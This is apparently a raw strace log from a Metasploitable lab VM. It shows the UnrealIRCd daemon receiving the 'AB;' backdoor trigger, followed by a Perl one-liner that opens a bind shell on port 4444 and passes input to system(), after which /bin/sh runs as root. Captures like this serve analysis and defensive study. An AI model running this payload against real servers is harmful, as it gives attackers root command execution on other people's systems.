4519  07:30:59.796964 select(1024, [2 3 4 7 9], [], NULL, {0, 960000}) = 1 (in [2], left {0, 770000})

4519  07:30:59.986928 clock_gettime(CLOCK_MONOTONIC, {2269, 803949393}) = 0

4519  07:30:59.986949 time(NULL)        = 1495625459

4519  07:30:59.987010 time(NULL)        = 1495625459

4519  07:30:59.987023 gettimeofday({1495625459, 987027}, NULL) = 0

4519  07:30:59.987051 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:30:59.987104 clock_gettime(CLOCK_MONOTONIC, {2269, 804117344}) = 0

4519  07:30:59.987115 gettimeofday({1495625459, 987118}, NULL) = 0

4519  07:30:59.987125 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:30:59.987163 clock_gettime(CLOCK_MONOTONIC, {2269, 804175896}) = 0

4519  07:30:59.987174 accept(2, 0, NULL) = 5

4519  07:30:59.987194 getpeername(5, {sa_family=AF_INET, sin_port=htons(40669), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:30:59.987226 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:30:59.987238 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:30:59.987251 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:30:59.987263 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:30:59.987274 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:30:59.987285 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:30:59.987319 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:30:59.987465 clock_gettime(CLOCK_MONOTONIC, {2269, 804545229}) = 0

4519  07:30:59.987545 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:30:59.987588 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:30:59.987598 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:30:59.987607 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:30:59.987617 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:30:59.987633 send(6, "\220C\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:30:59.987722 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:30:59.987760 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:30:59.987837 gettimeofday({1495625459, 987860}, NULL) = 0

4519  07:30:59.987884 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:30:59.992384 clock_gettime(CLOCK_MONOTONIC, {2269, 809401349}) = 0

4519  07:30:59.992468 recvfrom(6, "\220C\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0n\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:30:59.992544 close(6)          = 0

4519  07:30:59.992559 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:30:59.992573 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:30:59.992627 time(NULL)        = 1495625459

4519  07:30:59.992639 time(NULL)        = 1495625459

4519  07:30:59.992673 gettimeofday({1495625459, 992690}, NULL) = 0

4519  07:30:59.992698 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:30:59.992726 clock_gettime(CLOCK_MONOTONIC, {2269, 809738520}) = 0

4519  07:30:59.992736 gettimeofday({1495625459, 992739}, NULL) = 0

4519  07:30:59.992746 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:30:59.992784 clock_gettime(CLOCK_MONOTONIC, {2269, 809797004}) = 0

4519  07:30:59.992795 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:30:59.992823 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:30:59.992842 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:30:59.992854 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:30:59.992877 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10027

10027 07:30:59.993111 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10027 07:30:59.993141 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10027 07:30:59.993152 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10027 07:30:59.993166 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10027 07:30:59.993269 brk(0)            = 0x80f9000

10027 07:30:59.993291 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10027 07:30:59.993307 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fad000

10027 07:30:59.993322 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10027 07:30:59.993341 open("/etc/ld.so.cache", O_RDONLY) = 1

10027 07:30:59.993353 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10027 07:30:59.993371 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fa5000

10027 07:30:59.993382 close(1)          = 0

10027 07:30:59.993392 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10027 07:30:59.993407 open("/lib/libncurses.so.5", O_RDONLY) = 1

10027 07:30:59.993420 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10027 07:30:59.993537 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10027 07:30:59.993588 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f75000

10027 07:30:59.993625 mmap2(0xb7fa2000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fa2000

10027 07:30:59.993642 close(1)          = 0

10027 07:30:59.993674 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10027 07:30:59.993705 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10027 07:30:59.993756 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10027 07:30:59.993941 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10027 07:30:59.993979 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f71000

10027 07:30:59.994028 mmap2(0xb7f73000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f73000

10027 07:30:59.994062 close(1)          = 0

10027 07:30:59.994074 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10027 07:30:59.994089 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10027 07:30:59.994103 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10027 07:30:59.994233 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10027 07:30:59.994249 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f70000

10027 07:30:59.994263 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e21000

10027 07:30:59.994273 mmap2(0xb7f6a000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f6a000

10027 07:30:59.994290 mmap2(0xb7f6d000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f6d000

10027 07:30:59.994304 close(1)          = 0

10027 07:30:59.994340 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e20000

10027 07:30:59.994352 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e206b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10027 07:30:59.994421 mprotect(0xb7f6a000, 4096, PROT_READ) = 0

10027 07:30:59.994485 munmap(0xb7fa5000, 29913) = 0

10027 07:30:59.994557 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10027 07:30:59.994571 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10027 07:30:59.994590 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf965320) = -1 ENOTTY (Inappropriate ioctl for device)

10027 07:30:59.994620 brk(0)            = 0x80f9000

10027 07:30:59.994630 brk(0x80fa000)    = 0x80fa000

10027 07:30:59.994641 brk(0x80fb000)    = 0x80fb000

10027 07:30:59.994657 getuid32()        = 0

10027 07:30:59.994666 getgid32()        = 0

10027 07:30:59.994675 geteuid32()       = 0

10027 07:30:59.994684 getegid32()       = 0

10027 07:30:59.994697 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10027 07:30:59.994711 time(NULL)        = 1495625459

10027 07:30:59.994723 brk(0x80fc000)    = 0x80fc000

10027 07:30:59.994737 brk(0x80fd000)    = 0x80fd000

10027 07:30:59.994756 open("/proc/meminfo", O_RDONLY) = 1

10027 07:30:59.994777 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10027 07:30:59.994795 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fac000

10027 07:30:59.994806 read(1, "MemTotal:      1035240 kB\nMemFree:        435588 kB\nBuffers:         75184 kB\nCached:         365388 kB\nSwapCached:          0 kB\nActive:         256140 kB\nInactive:       313388 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        435348 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4648 kB\nWriteback:           0 kB\nAnonPages:      129008 kB\nMapped:          52000 kB\nSlab:            18828 kB\nSReclaimable:    10308 kB\nSUnreclaim:       8520 kB\nPageTables:       1968 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10027 07:30:59.994893 close(1)          = 0

10027 07:30:59.994904 munmap(0xb7fac000, 4096) = 0

10027 07:30:59.994915 brk(0x80fe000)    = 0x80fe000

10027 07:30:59.994941 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10027 07:30:59.994963 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10027 07:30:59.995003 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10027 07:30:59.995015 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10027 07:30:59.995041 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10027 07:30:59.995080 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10027 07:30:59.995093 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10027 07:30:59.995105 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10027 07:30:59.995118 uname({sys="Linux", node="metasploitable", ...}) = 0

10027 07:30:59.995165 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10027 07:30:59.995183 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10027 07:30:59.995202 brk(0x8100000)    = 0x8100000

10027 07:30:59.995213 getcwd("/etc/unreal", 4096) = 12

10027 07:30:59.995227 getpid()          = 10027

10027 07:30:59.995243 getppid()         = 4519

10027 07:30:59.995259 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10027 07:30:59.995278 stat64("/sbin/sh", 0xbf9652f8) = -1 ENOENT (No such file or directory)

10027 07:30:59.995291 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10027 07:30:59.995308 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10027 07:30:59.995332 socket(PF_FILE, SOCK_STREAM, 0) = 1

10027 07:30:59.995345 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10027 07:30:59.995357 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10027 07:30:59.995378 close(1)          = 0

10027 07:30:59.995389 socket(PF_FILE, SOCK_STREAM, 0) = 1

10027 07:30:59.995399 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10027 07:30:59.995408 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10027 07:30:59.995439 close(1)          = 0

10027 07:30:59.995461 open("/etc/nsswitch.conf", O_RDONLY) = 1

10027 07:30:59.995478 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10027 07:30:59.995517 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fac000

10027 07:30:59.995543 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10027 07:30:59.995593 read(1, "", 4096) = 0

10027 07:30:59.995603 close(1)          = 0

10027 07:30:59.995612 munmap(0xb7fac000, 4096) = 0

10027 07:30:59.995628 open("/etc/ld.so.cache", O_RDONLY) = 1

10027 07:30:59.995641 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10027 07:30:59.995657 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fa5000

10027 07:30:59.995671 close(1)          = 0

10027 07:30:59.995682 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10027 07:30:59.995698 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10027 07:30:59.995713 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10027 07:30:59.995803 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10027 07:30:59.995821 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e17000

10027 07:30:59.995833 mmap2(0xb7e1e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e1e000

10027 07:30:59.995851 close(1)          = 0

10027 07:30:59.995863 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10027 07:30:59.995876 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10027 07:30:59.995890 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10027 07:30:59.996040 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10027 07:30:59.996060 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dff000

10027 07:30:59.996072 mmap2(0xb7e13000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e13000

10027 07:30:59.996089 mmap2(0xb7e15000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e15000

10027 07:30:59.996117 close(1)          = 0

10027 07:30:59.996148 munmap(0xb7fa5000, 29913) = 0

10027 07:30:59.996167 open("/etc/ld.so.cache", O_RDONLY) = 1

10027 07:30:59.996180 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10027 07:30:59.996197 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fa5000

10027 07:30:59.996207 close(1)          = 0

10027 07:30:59.996217 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10027 07:30:59.996232 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10027 07:30:59.996247 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

